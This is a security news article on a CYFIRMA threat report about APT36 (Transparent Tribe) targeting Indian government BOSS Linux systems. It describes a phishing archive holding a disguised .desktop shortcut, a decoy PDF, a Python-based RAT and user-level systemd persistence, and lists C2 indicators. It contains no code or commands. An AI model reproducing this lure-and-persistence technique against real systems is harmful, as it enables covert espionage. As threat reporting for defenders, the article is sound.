Ddos 
A prominent state-aligned threat actor has significantly evolved its arsenal, launching a sophisticated campaign targeting the Linux-based operating systems used by Indian government sectors. A new report from CYFIRMA reveals that APT36, also known as Transparent Tribe, is now deploying tailored malware specifically crafted to compromise BOSS (Bharat Operating System Solutions) Linux environments.
Historically known for targeting Windows systems, APT36 has demonstrated a “growing technical maturity” by pivoting to Linux ecosystems essential to India’s strategic sectors. The threat actor has adopted a “dual-platform delivery” strategy, ensuring their tools can compromise both Windows and Linux environments to maintain long-term, covert access.
This shift allows the group to “expand its operational reach, enhance success rates across diverse environments, and maintain covert, long-term access to critical government infrastructure.”
The intrusion begins with a spear-phishing email containing a malicious archive named Analysis_Proc_Report_Gem_2025.zip. Inside, victims find a file that appears to be a document but is actually a weaponized Linux shortcut file (.desktop).
This shortcut, titled Analysis_Proc_Report_Gem.desktop, is engineered to deceive. It uses the Icon=x-office-document metadata to mimic a legitimate office document. However, once clicked, it “silently download[s] and run[s] malicious components in the background while presenting benign content to the user.”
The execution flow is a multi-stage process designed for stealth:
- The Decoy: The script retrieves a decoy PDF (Analysis_Proc_Report_Gem.pdf) and opens it with LibreOffice. The PDF is password-protected to stall the user and draw their attention while the malware installs.
- The Payload: Simultaneously, the script downloads two files from an attacker-controlled server: an ELF binary named swcbc and a shell script swcbc.sh.
- Persistence: The malware establishes persistence using systemd. It creates a user-level service file that ensures the malware “runs immediately and persists across user sessions” without requiring root privileges.
The core payload, swcbc, is a 64-bit ELF binary. Analysis reveals it is a “Python-based Remote Administration Tool (RAT) compiled using PyInstaller.”
Crucially, the recovered source code shows that the malware is designed to be cross-platform. It contains logic to identify the operating system and adapt its behavior accordingly:
- On Linux: It hides in the ~/.swcbc directory.
- On Windows: It installs itself in the %USERPROFILE%\swcbc folder and modifies the Registry for persistence.
The RAT provides a full suite of espionage capabilities, including:
- Arbitrary Command Execution: Running shell commands with system-level access.
- File Exfiltration: Uploading and downloading files to/from the C2 server.
- Screen Capture: Taking screenshots to provide “real-time visual monitoring” of the victim’s desktop.
The campaign relies on specific infrastructure for command and control. The primary domain identified is lionsdenim[.]xyz, a recently registered domain resolving to an IP address in Los Angeles. Payload delivery was traced to the IP address 185.235.137.90 located in Germany.
APT36’s move to target BOSS Linux represents a critical escalation in regional cyber-espionage. By tailoring their toolset to the specific “indigenous platforms” used by Indian government agencies, the group aims to bypass traditional security controls.
“The campaign underscores APT36’s increasing technical sophistication, rapid deployment of tailored payloads, and strategic focus on multi-platform exploitation,” the report concludes.
Related Posts:
- APT36 Unleashes Linux Malware: Transparent Tribe Targets Indian Government with Go-Based Espionage Tools
- Linux Under Attack: APT36 Launches New Cyber-Espionage Campaign on Indian Govt
- Beyond Windows: Pakistan’s APT36 Group Is Now Attacking Linux Systems with Stealthy Malware
- APT36 Suspected in India Gov Spoofing Phishing with ClickFix Tactics
Donate